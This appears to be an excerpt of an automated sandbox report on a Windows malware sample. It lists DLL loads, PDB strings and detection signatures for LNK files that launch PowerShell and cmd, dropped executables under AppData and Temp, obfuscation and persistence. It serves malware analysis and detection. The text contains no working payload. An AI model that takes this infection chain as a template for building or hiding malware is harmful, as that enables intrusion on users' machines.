Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: es.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: bitsproxy.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: dzipr.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: pla.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: pdh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: tdh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: wevtapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: shdocvw.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: dzipr.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: pla.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: pdh.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: tdh.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: mstask.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: shdocvw.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: aepic.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: powrprof.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dxgi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wtsapi32.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: umpdc.dll
Source: C:\Windows\SysWOW64\explorer.exe Section loaded: shdocvw.dll
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: uvnhjq.19.dr LNK file: ..\..\Roaming\Ruy_driverv2\DZIPR.exe
Source: BIT2369.tmp.21.dr LNK file: ..\..\Roaming\Ruy_driverv2\DZIPR.exe
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: msacm32.pdbUGP source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647742900.0000000000482000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2757855590.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928565084.0000000000482000.00000008.00000001.01000000.00000000.sdmp, gps.28.dr
Source: Binary string: msacm32.pdb source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647742900.0000000000482000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2757855590.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928565084.0000000000482000.00000008.00000001.01000000.00000000.sdmp, gps.28.dr
Source: Binary string: wntdll.pdbUGP source: DZIPR.exe, 00000011.00000002.2345624953.0000000003B30000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2344649003.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647242156.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647012116.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758662727.0000000005900000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758330772.0000000005467000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647951054.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648211502.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929229383.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2928936283.0000000004626000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758507951.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758130432.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929126997.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928791787.00000000049B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: DZIPR.exe, 00000011.00000002.2345624953.0000000003B30000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2344649003.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647242156.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647012116.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758662727.0000000005900000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758330772.0000000005467000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647951054.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648211502.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929229383.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2928936283.0000000004626000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758507951.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758130432.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929126997.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928791787.00000000049B7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: AUGUST.exe, 00000010.00000003.2318798588.000000000278D000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp, DZIPR.exe, 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.exe, 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.dll.16.dr
Contains functionality to dynamically determine API calls
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow, 16_2_00406D5D
PE file contains an invalid checksum
Source: gps.28.dr Static PE information: real checksum: 0x0 should be: 0x7d505
Source: DZIPR.dll.17.dr Static PE information: real checksum: 0x601f9 should be: 0x5ee7e
Source: DZIPR.dll.16.dr Static PE information: real checksum: 0x601f9 should be: 0x5ee7e
Source: AUGUST.exe.11.dr Static PE information: real checksum: 0x33302 should be: 0x4a3c93
Source: demhwk.19.dr Static PE information: real checksum: 0x0 should be: 0x7d505
Source: qapuwvr.24.dr Static PE information: real checksum: 0x0 should be: 0x7d505
PE file contains sections with non-standard names
Source: DZIPR.exe.16.dr Static PE information: section name: .didata
Source: DZIPR.exe.17.dr Static PE information: section name: .didata
Source: demhwk.19.dr Static PE information: section name: cmxvoc
Source: qapuwvr.24.dr Static PE information: section name: cmxvoc
Source: gps.28.dr Static PE information: section name: cmxvoc
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\AUGUST.exe Code function: 16_2_00411C20 push eax; ret 16_2_00411C4E
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA55401 push ecx; ret 17_2_6FA55414
Source: C:\Users\user\DZIPR.exe Code function: 17_2_6FA551A1 push ecx; ret 17_2_6FA551B4
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C525401 push ecx; ret 18_2_6C525414
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 18_2_6C5251A1 push ecx; ret 18_2_6C5251B4
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD5401 push ecx; ret 23_2_6FAD5414
Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Code function: 23_2_6FAD51A1 push ecx; ret 23_2_6FAD51B4

Persistence and Installation Behavior
barindex
Windows shortcut file (LNK) starts blacklisted processes
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\cmd.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Jump to behavior
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe Jump to behavior
Source: LNK file Process created: C:\Windows\SysWOW64\cmd.exe
Drops PE files
Source: C:\Users\user\DZIPR.exe File created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\AUGUST.exe Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\qapuwvr Jump to dropped file
Source: C:\Users\user\AppData\Roaming\AUGUST.exe File created: C:\Users\user\DZIPR.dll Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\demhwk Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\gps Jump to dropped file
Source: C:\Users\user\AppData\Roaming\AUGUST.exe File created: C:\Users\user\DZIPR.exe Jump to dropped file
Source: C:\Users\user\DZIPR.exe File created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Users\user\AppData\Roaming\AUGUST.exe File created: C:\Users\user\DZIPR.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\AUGUST.exe File created: C:\Users\user\DZIPR.exe Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\demhwk Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\qapuwvr Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\gps Jump to dropped file

Boot Survival
barindex
Drops PE files to the user root directory
